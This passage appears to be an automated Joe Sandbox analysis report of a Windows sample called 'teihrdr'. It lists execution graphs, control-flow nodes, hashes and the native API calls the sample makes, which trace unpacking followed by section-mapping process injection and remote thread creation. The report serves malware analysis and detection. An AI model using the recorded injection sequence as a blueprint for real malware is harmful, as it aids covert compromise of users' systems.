• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction ID: b998c0787fde743c1faaa00c6b6383a1fde40c4b179baa501c1335e54fd56591
• Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction Fuzzy Hash: E7112B79A00208EFDB01DF98C985E99BFF5AF08351F1580A4F9489B362D371EA50DB80

Execution Graph

Execution Coverage: 7.9%
Dynamic/Decrypted Code Coverage: 42.6%
Signature Coverage: 0%
Total number of Nodes: 122
Total number of Limit Nodes: 4
[Execution graph image omitted; its nodes are labelled with the APIs Sleep, NtDuplicateObject, NtCreateSection, NtMapViewOfSection, SetErrorMode, VirtualAlloc, VirtualProtect, VirtualFree, LoadLibraryA, GetPEB, CreateToolhelp32Snapshot, Module32First, RtlCreateUserThread and NtTerminateProcess]

Control-flow Graph
[Control-flow graph image omitted; function at 00401514, whose nodes call NtDuplicateObject, NtCreateSection and NtMapViewOfSection]
APIs
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
Memory Dump Source
• Source File: 00000008.00000002.2779673143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_teihrdr.jbxd
Similarity
• API ID: Section$View$Create$DuplicateObject
• String ID:
• API String ID: 1546783058-0
• Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
• Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
• Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
• Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Control-flow Graph
[Control-flow graph image omitted; function at 004014FE, whose nodes call NtDuplicateObject, NtCreateSection and NtMapViewOfSection]
APIs
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
Memory Dump Source
• Source File: 00000008.00000002.2779673143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_teihrdr.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectView
• String ID:
• API String ID: 1652636561-0
• Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
• Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
• Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
• Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Control-flow Graph
[Control-flow graph image omitted; function at 00401542, whose nodes call NtDuplicateObject, NtCreateSection and NtMapViewOfSection]
APIs
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
Memory Dump Source
• Source File: 00000008.00000002.2779673143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_teihrdr.jbxd
Similarity
• API ID: Section$View$Create$DuplicateObject
• String ID:
• API String ID: 1546783058-0
• Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
• Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
• Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
• Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Control-flow Graph
[Control-flow graph image omitted; function at 00401549, whose nodes call NtDuplicateObject, NtCreateSection and NtMapViewOfSection]
APIs
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
Memory Dump Source
• Source File: 00000008.00000002.2779673143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_teihrdr.jbxd
Similarity
• API ID: Section$View$Create$DuplicateObject
• String ID:
• API String ID: 1546783058-0
• Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
• Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
• Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
• Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

Control-flow Graph
[Control-flow graph image omitted; function at 00401557, whose nodes call NtDuplicateObject, NtCreateSection and NtMapViewOfSection]
APIs
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
Memory Dump Source
• Source File: 00000008.00000002.2779673143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_teihrdr.jbxd
Similarity
• API ID: Section$View$Create$DuplicateObject
• String ID:
• API String ID: 1546783058-0
• Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
• Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
• Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
• Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 302 402f97-402fbb 303 402fc1-402fd9 302->303 304 4030ee-4030f3 302->304 303->304 305 402fdf-402ff0 303->305 306 402ff2-402ffb 305->306 307 403000-40300e 306->307 307->307 308 403010-403017 307->308 309 403039-403040 308->309 310 403019-403038 308->310 311 403062-403065 309->311 312 403042-403061 309->312 310->309 313 403067-40306a 311->313 314 40306e 311->314 312->311 313->314 315 40306c 313->315 314->306 316 403070-403075 314->316 315->316 316->304 317 403077-40307a 316->317 317->304 318 40307c-4030eb RtlCreateUserThread NtTerminateProcess 317->318 318->304
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2779673143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: CreateProcessTerminateThreadUser
                                          • String ID:
                                          • API String ID: 1921587553-0
                                          • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                          • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                          • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                          • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 70003c-700047 1 700049 0->1 2 70004c-700263 call 700a3f call 700e0f call 700d90 VirtualAlloc 0->2 1->2 17 700265-700289 call 700a69 2->17 18 70028b-700292 2->18 23 7002ce-7003c2 VirtualProtect call 700cce call 700ce7 17->23 20 7002a1-7002b0 18->20 22 7002b2-7002cc 20->22 20->23 22->20 29 7003d1-7003e0 23->29 30 7003e2-700437 call 700ce7 29->30 31 700439-7004b8 VirtualFree 29->31 30->29 33 7005f4-7005fe 31->33 34 7004be-7004cd 31->34 37 700604-70060d 33->37 38 70077f-700789 33->38 36 7004d3-7004dd 34->36 36->33 40 7004e3-700505 36->40 37->38 43 700613-700637 37->43 41 7007a6-7007b0 38->41 42 70078b-7007a3 38->42 52 700517-700520 40->52 53 700507-700515 40->53 44 7007b6-7007cb 41->44 45 70086e-7008be LoadLibraryA 41->45 42->41 46 70063e-700648 43->46 48 7007d2-7007d5 44->48 51 7008c7-7008f9 45->51 46->38 49 70064e-70065a 46->49 54 700824-700833 48->54 55 7007d7-7007e0 48->55 49->38 50 700660-70066a 49->50 56 70067a-700689 50->56 58 700902-70091d 51->58 59 7008fb-700901 51->59 60 700526-700547 52->60 53->60 57 700839-70083c 54->57 61 7007e2 55->61 62 7007e4-700822 55->62 63 700750-70077a 56->63 64 70068f-7006b2 56->64 57->45 65 70083e-700847 57->65 59->58 66 70054d-700550 60->66 61->54 62->48 63->46 69 7006b4-7006ed 64->69 70 7006ef-7006fc 64->70 71 700849 65->71 72 70084b-70086c 65->72 67 7005e0-7005ef 66->67 68 700556-70056b 66->68 67->36 74 70056d 68->74 75 70056f-70057a 68->75 69->70 76 70074b 70->76 77 7006fe-700748 70->77 71->45 72->57 74->67 78 70059b-7005bb 75->78 79 70057c-700599 75->79 76->56 77->76 84 7005bd-7005db 78->84 79->84 84->66
                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0070024D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2780540702.0000000000700000.00000040.00001000.00020000.00000000.sdmp, Offset: 00700000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_700000_teihrdr.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID: cess$kernel32.dll
                                          • API String ID: 4275171209-1230238691
                                          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                          • Instruction ID: 9be9b3c6779dbc4fec803037c48c4e54be1ef0d9e37ab80a9898581bd6dc0544
                                          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                          • Instruction Fuzzy Hash: 5C527974A00229DFDB64CF58C984BA8BBB1BF09314F1481E9E50DAB391DB34AE94DF54

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 319 741518-741531 320 741533-741535 319->320 321 741537 320->321 322 74153c-741548 CreateToolhelp32Snapshot 320->322 321->322 323 741558-741565 Module32First 322->323 324 74154a-741550 322->324 325 741567-741568 call 7411d7 323->325 326 74156e-741576 323->326 324->323 329 741552-741556 324->329 330 74156d 325->330 329->320 329->323 330->326
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00741540
                                          • Module32First.KERNEL32(00000000,00000224), ref: 00741560
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2780779918.000000000072F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0072F000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_72f000_teihrdr.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFirstModule32SnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 3833638111-0
                                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                          • Instruction ID: e92ca047c6852e13e11003d318d704e8dd8c0a899fad39ba178357769d0b7357
                                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                          • Instruction Fuzzy Hash: 6AF0F6352003146BD7203BF9A88CBAEB6E8AF89324F500528F643920C0DB74EC854A60

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 332 700e0f-700e24 SetErrorMode * 2 333 700e26 332->333 334 700e2b-700e2c 332->334 333->334
                                          APIs
                                          • SetErrorMode.KERNELBASE(00000400,?,?,00700223,?,?), ref: 00700E19
                                          • SetErrorMode.KERNELBASE(00000000,?,?,00700223,?,?), ref: 00700E1E
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2780540702.0000000000700000.00000040.00001000.00020000.00000000.sdmp, Offset: 00700000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_700000_teihrdr.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                          • Instruction ID: 363d1c857498136fbe31aee574387ff28b79b8b4375f79cccd03c8d3e1615692
                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                          • Instruction Fuzzy Hash: AED01231145128B7D7003A94DC09BCD7B5CDF05B62F008411FB0DE9080C774994046E5

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 335 4018e6-40194b call 401193 Sleep call 40141f 349 40195a-4019a5 call 401193 335->349 350 40194d-401955 call 401514 335->350 350->349
                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 00401936
                                            • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                            • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                            • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2779673143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: Section$CreateDuplicateObjectSleepView
                                          • String ID:
                                          • API String ID: 1885482327-0
                                          • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                          • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                          • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                          • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 364 401915-401918 365 4018c6-4018c7 364->365 366 40191a-40194b call 401193 Sleep call 40141f 364->366 367 4018d7 365->367 368 4018ce-4018e3 call 401193 365->368 378 40195a-4019a5 call 401193 366->378 379 40194d-401955 call 401514 366->379 367->368 379->378
                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 00401936
                                            • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                            • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                            • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2779673143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: Section$CreateDuplicateObjectSleepView
                                          • String ID:
                                          • API String ID: 1885482327-0
                                          • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                          • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                          • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                          • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 393 4018f1-40194b call 401193 Sleep call 40141f 403 40195a-4019a5 call 401193 393->403 404 40194d-401955 call 401514 393->404 404->403
                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 00401936
                                            • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                            • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                            • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2779673143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: Section$CreateDuplicateObjectSleepView
                                          • String ID:
                                          • API String ID: 1885482327-0
                                          • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                          • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                          • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                          • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 418 401912-40194b call 401193 Sleep call 40141f 429 40195a-4019a5 call 401193 418->429 430 40194d-401955 call 401514 418->430 430->429
                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 00401936
                                            • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                            • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                            • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2779673143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: Section$CreateDuplicateObjectSleepView
                                          • String ID:
                                          • API String ID: 1885482327-0
                                          • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                          • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                          • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                          • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 444 7411d7-741211 call 7414ea 447 741213-741246 VirtualAlloc call 741264 444->447 448 74125f 444->448 450 74124b-74125d 447->450 448->448 450->448
                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00741228
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2780779918.000000000072F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0072F000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_72f000_teihrdr.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                          • Instruction ID: 96c8ce7fdcfdcdf07e9d0d1261abbbd42b069f58392f8b3a3ac8505bab92dd24
                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                          • Instruction Fuzzy Hash: 80113C79A00208EFDB01DF98C985E98BBF5AF08750F158094FA489B362D375EA90DF80

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 451 401925-40194b call 401193 Sleep call 40141f 459 40195a-4019a5 call 401193 451->459 460 40194d-401955 call 401514 451->460 460->459
                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 00401936
                                            • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                            • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                            • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2779673143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: Section$CreateDuplicateObjectSleepView
                                          • String ID:
                                          • API String ID: 1885482327-0
                                          • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                          • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                          • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                          • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

                                          Execution Graph

                                          Execution Coverage:6.2%
                                          Dynamic/Decrypted Code Coverage:42.5%
                                          Signature Coverage:0%
                                          Total number of Nodes:113
                                          Total number of Limit Nodes:4
                                          execution_graph 4214 403043 4215 40319a 4214->4215 4216 40306d 4214->4216 4216->4215 4217 403128 RtlCreateUserThread NtTerminateProcess 4216->4217 4217->4215 4299 4014cf 4300 4014d3 4299->4300 4301 401660 NtDuplicateObject 4300->4301 4310 401571 4300->4310 4302 40167d NtCreateSection 4301->4302 4301->4310 4303 4016a3 NtMapViewOfSection 4302->4303 4304 4016fd NtCreateSection 4302->4304 4303->4304 4306 4016c6 NtMapViewOfSection 4303->4306 4305 401729 4304->4305 4304->4310 4308 401733 NtMapViewOfSection 4305->4308 4305->4310 4306->4304 4307 4016e4 4306->4307 4307->4304 4309 40175a NtMapViewOfSection 4308->4309 4308->4310 4309->4310 4273 520001 4274 520005 4273->4274 4279 52092b GetPEB 4274->4279 4276 520030 4281 52003c 4276->4281 4280 520972 4279->4280 4280->4276 4282 520049 4281->4282 4283 520e0f 2 API calls 4282->4283 4284 520223 4283->4284 4285 520d90 GetPEB 4284->4285 4286 520238 VirtualAlloc 4285->4286 4287 520265 4286->4287 4288 5202ce VirtualProtect 4287->4288 4290 52030b 4288->4290 4289 520439 VirtualFree 4293 5204be LoadLibraryA 4289->4293 4290->4289 4292 5208c7 4293->4292 4400 4015d5 4401 4015e4 4400->4401 4402 401660 NtDuplicateObject 4401->4402 4411 40177c 4401->4411 4403 40167d NtCreateSection 4402->4403 4402->4411 4404 4016a3 NtMapViewOfSection 4403->4404 4405 4016fd NtCreateSection 4403->4405 4404->4405 4407 4016c6 NtMapViewOfSection 4404->4407 4406 401729 4405->4406 4405->4411 4409 401733 NtMapViewOfSection 4406->4409 4406->4411 4407->4405 4408 4016e4 4407->4408 4408->4405 4410 40175a NtMapViewOfSection 4409->4410 4409->4411 4410->4411 4233 402f16 4234 402f1a 4233->4234 4236 402fa2 4234->4236 4237 401991 4234->4237 4238 4019a0 4237->4238 4239 4019d8 Sleep 4238->4239 4241 4019f3 4239->4241 4242 4014c4 4239->4242 4241->4236 4243 4014d3 4242->4243 4244 401660 NtDuplicateObject 4243->4244 4253 401571 4243->4253 4245 40167d NtCreateSection 4244->4245 4244->4253 4246 4016a3 NtMapViewOfSection 4245->4246 4247 4016fd NtCreateSection 4245->4247 4246->4247 4249 4016c6 NtMapViewOfSection 4246->4249 4248 401729 4247->4248 4247->4253 4251 401733 NtMapViewOfSection 4248->4251 4248->4253 4249->4247 4250 4016e4 4249->4250 4250->4247 4252 40175a NtMapViewOfSection 4251->4252 4251->4253 4252->4253 4253->4241 4294 520005 4295 52092b GetPEB 4294->4295 4296 520030 4295->4296 4297 52003c 7 API calls 4296->4297 4298 520038 4297->4298 4371 402e9a 4372 402e5f 4371->4372 4373 402eaf 4371->4373 4374 402fa2 4373->4374 4375 401991 8 API calls 4373->4375 4375->4374 4323 402ee7 4324 402ef9 4323->4324 4325 402fa2 4324->4325 4326 401991 8 API calls 4324->4326 4326->4325 4448 4019a9 4449 4019a0 4448->4449 4450 4019d8 Sleep 4449->4450 4451 4014c4 7 API calls 4450->4451 4452 4019f3 4450->4452 4451->4452 4254 52003c 4255 520049 4254->4255 4267 520e0f SetErrorMode SetErrorMode 4255->4267 4260 520265 4261 5202ce VirtualProtect 4260->4261 4263 52030b 4261->4263 4262 520439 VirtualFree 4266 5204be LoadLibraryA 4262->4266 4263->4262 4265 5208c7 4266->4265 4268 520223 4267->4268 4269 520d90 4268->4269 4270 520dad 4269->4270 4271 520dbb GetPEB 4270->4271 4272 520238 VirtualAlloc 4270->4272 4271->4272 4272->4260 4218 58ebad 4219 58ebbc 4218->4219 4222 58f34d 4219->4222 4223 58f368 4222->4223 4224 58f371 CreateToolhelp32Snapshot 4223->4224 4225 58f38d Module32First 4223->4225 4224->4223 4224->4225 4226 58f39c 4225->4226 4227 58ebc5 4225->4227 4229 58f00c 4226->4229 4230 58f037 4229->4230 4231 58f048 VirtualAlloc 4230->4231 4232 58f080 4230->4232 4231->4232 4232->4232 4376 401975 4377 401979 4376->4377 4378 4014c4 7 API calls 4377->4378 4379 4019f3 4378->4379

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
